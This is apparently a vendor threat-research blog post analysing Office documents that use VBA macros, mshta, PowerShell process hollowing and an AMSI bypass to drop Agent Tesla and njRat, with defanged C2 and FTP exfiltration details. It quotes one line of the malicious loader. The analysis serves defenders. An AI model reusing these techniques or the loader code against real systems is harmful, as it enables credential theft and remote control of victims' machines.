FortiGuard Labs Threat Research

Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat

By Cara Lin | October 03, 2022

We recently found some malicious Microsoft Office documents that attempted to leverage legitimate websites—MediaFire and Blogger—to execute a shell script and then dropped two malware variants of Agent Tesla and njRat. Agent Tesla is a well-known spyware, first discovered in 2014, which can steal personal data from web browsers, mail clients, and FTP servers, collect screenshots and videos, and capture clipboard data. njRat (also known as Bladabindi) is a remote agent Trojan first discovered in 2013 that is capable of remotely controlling a victim’s device to log keystrokes, access the camera, steal credentials stored in browsers, upload/download files, manipulate the registry, and more.

Affected platforms: Microsoft Windows
Impacted parties: Windows users
Impact: Control and collect sensitive information from a victim’s device
Severity level: Critical

In this article we will provide details of the documents we discovered, their embedded scripts used to deliver a payload, and the behavior of these malware variants.

1st Stage

In September 2022 we collected two kinds of files. One is a PowerPoint Add-in and another is a Word document that contained a lure picture and an embedded Excel form. Both files included similar VBA scripts that execute a macro right after opening the document.

Based on the VBA script in the PPT add-in, shown in Figure 1, the code is automatically triggered because it uses the “Auto_Open()” function. Its “ControlTipText” and “Tag” fields contain the complete command “mshta” and the MediaFire URL. We can see the full URL in “vbaProject.bin”.

Figure 1: The VBA macro from the PPT add-In
Figure 2: Complete malicious URL in the vbaProject.bin file

2nd Stage

We can see from Process Explorer shown in Figure 3 that the “mshta” process started right after clicking “Enable Macros” in the document. This leads to the MediaFire website, which is a legitimate file and picture sharing platform.

Figure 3: Process Explorer after clicking “Enable Macros”

Below is the content of “1.htm” from the first stage VBA macro:

Figure 4: “1.htm” downloaded from MediaFire

Figure 5 shows a clearer picture after converting some hex to ascii string.

Figure 5: Converted "1.htm"
This HTML file has three main jobs:
  1. Deliver a third-stage script file from the MediaFire site
  2. Kill the task WINWORD.EXE
  3. Add persistence by creating a scheduled task. It uses “mshta” to connect to the “http[:]//[.]uk/p/1[.]html” site, which contains a similar script every 73 minutes. The blog screenshot seen below is from September 2022:
Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September

We also discovered that the 1.html file in “www[.]webclientservices[.]co[.]uk” had been updated and renamed as “real all BACK SEP 2022”. The embedded JavaScript was also changed and now delivers other malware. More details are in the following section.

Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September

3rd Stage

The PowerShell script in “1.txt”, downloaded from MediaFire, delivers its final payload via the process hollowing technique. It first kills all related processes and decodes the loader and payload. It then invokes the final payload and deploys it, bypassing AMSI. The main malware and part of the code are encoded and replaced with strings to increase the difficulty of analysis.

Figure 8: Full picture of the PowerShell used to load Agent Tesla
Figure 9: Process Explorer after PowerShell is executed

In the second part of the “Load Agent Tesla Payload” process, the variables $CLE11 and $RNBX1 are the final payload and the loader after replacing some strings. Based on different version of .NET, it customizes paths for proceeding with the process hollowing activity:

$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe'

$Path2 = 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe'

$Path3 = 'C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

      [Ref]/Assembly::Load((HexaToByte($RNBX1))).GetType('CALC'.PAYSIAS'.'GetMethod'(Execute).Invoke($null,[object[]] ($Path, HexaToByte($CLE11)));

We saved $RNBX1 as an executable file and opened it with dnSpy. The target class and method can be seen in Figure 10. This .Net loader leverages some obfuscation to hide the main APIs (CreateProcess, VirtualAllocEx…, etc.)

Figure 10: .Net Loader

We located the targeted processes, “jsc.ex”, “caspol.exe” and “Msbuild.exe”, running quietly in the victim’s machine. The details are shown in Figure 11.

Figure 11: Process Explorer while process hollowing

In the end of the PowerShell section, it disables logging and bypasses AMSI by patching it. Detail steps can be seen in Figure 12.

Figure 12: Bypassing AMSI in PowerShell

Final Stage – Part 1

The first malware payload is Agent Tesla. This variant began spreading in the middle of September. It includes legitimate file information, "Web Browser Password Viewer" from the company “NirSoft”, and uses FTP to send out stolen data.

Figure 13: Basic information of Agent Tesla

Figure 14 is a screenshot of the attacker’s FTP server information, including username and password, used for transferring extracted data. This variant also copies itself into the %appdata% directory with the filename “NGCwje.exe” for persistence.

Figure 14: The attacker’s server information

It then starts to extract the victim device’s information, such as serial number of the base board, processor ID, and MAC address. It then generates an MD5 hash for this data.

Figure 15: Generating an Md5 hash for the victim machine’s information

Agent Tesla uses a typical application list to steal login credentials, cookies, mail information, and VPN data. A partial set of these items can be seen in the following figure:

Figure 16: List for targeted browser applications

Once the malware retrieves the credentials and other information from the victim’s machine, it sends this data via FTP protocol using hardcoded IP. 

Figure 17: Utilizing the FTP protocol
Figure 18: Traffic capture from the victim's machine

Based on the different types of files it encounters, it utilizes four kinds of opening strings: “CO” is for cookie data, “KL” is for keyboard logging, “PW” is for the victim’s password information, and “SC” is for screenshot files. The malware uses underlines to connect the type of data, username, device name, and timestamp together for the filename for the data ZIP file. The list of stolen zip files is shown as below:

Figure 19: Partial list of the Zip files on the FTP server

Final Stage – Part 2

The second payload is njRat, also known as Bladabindi. It is a .NET Trojan for controlling and spying on a victim’s device. This variant uses obfuscation for its string generation and code flow. From an IDA graph overview of method ko(), you can see that this variant is more complex, but you can still identify the similar functions.

Figure 20: IDA graph overview
Figure 21: The entry point of njRat
Figure 22: String decoding function

First, it creates lnk and exe files in the “Startup” and “Templates” folder with the filename “Windows”. This name is used to trick users and analysts into thinking it is a legitimate Windows file.

Figure 23: Creating persistence

It then gets its command and control server hostname and port number in reverse order.

Figure 24: Command and control server information

To make sure this malware only runs on this victim once, it adds “HKEY_CURRENT_USER” with name “di” and data “!”.

Figure 25: Adding to the registry in “HKEY_CURRENT_USER”
Figure 26: Registry status

It also creates a mutex with the string “Windows”, sets the environment variable “SEE_MASK_NOZONECHECKS” to 1, and checks if this mutex had been created before. If yes, it ends the process.

Figure 27: Creating a mutex
Figure 28: Setting the environment variable

After it collects the machine’s information, it uses base64 to encode it and concatenates the data, as seen in Figure 29. It then transfers the data to server “mobnew6565[.]duckdns[.]org” using hardcoded TCP port 7575.

Figure 29: Concatenated data

Following is the C2 traffic from the Win10 victim machine. The separator changes to “|-F-|” and version is “v4.0”, but the format for the packet is similar to the old njRat version:

<message length>.<command>|-F-|<data> 

Figure 30: Traffic captured from the victim

Besides Agent Tesla and njRat, we also found a short script in the updated HTML file “[.]uk/p/1[.]html” that downloads a miner to “C:\\ProgramData”. This is odd behavior since each step in this attack chain is trying to not leave any physical trace or file on the victim’s machine. We think this might be a distraction for victims so as to not notice that another process is loading njRat.

Figure 31: JavaScript that downloads a miner
Figure 32: Process Explorer view for njRat and miner


Agent Tesla and njRat have both been highly active malware for years. Their functions are mature and easy to use for spying on or stealing information. As we mentioned previously, the malicious URL keeps updating its embedded JavaScript, which means these phishing emails and lure office documents are always an efficient way to spread this malware. All the VBA macro, PowerShell, and JavaScript code embedded in the website can deploy fileless attacks and also evade some virus detection by obfuscating or encoding the strings.

Users should always be wary of any office document or unknown file containing links to external websites.

Figure 33: Attack flow

Fortinet Protections

The VBA macro and all related malware are detected and blocked by FortiGuard Antivirus:


Both the downloaded URL and attacker’s host have been rated as "Malicious Websites" by the FortiGuard Web Filtering service.

Microsoft Office files can be disarmed by the FortiGuard Content Disarm & Reconstruction (CDR) service.

Since the majority of malware is delivered via phishing, organizations should also consider leveraging Fortinet solutions designed to train users to understand and detect phishing threats:

Our FREE NSE trainingNSE 1 – Information Security Awareness includes a module on internet threats designed to help end users learn how to identify and protect themselves from various types of phishing attacks and can be easily added to internal training programs.

The FortiPhish Phishing Simulation Service uses real-world simulations to help organizations test user awareness and vigilance to phishing threats and to train and reinforce proper practices when users encounter targeted phishing attacks.



Office Document


Script File






Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.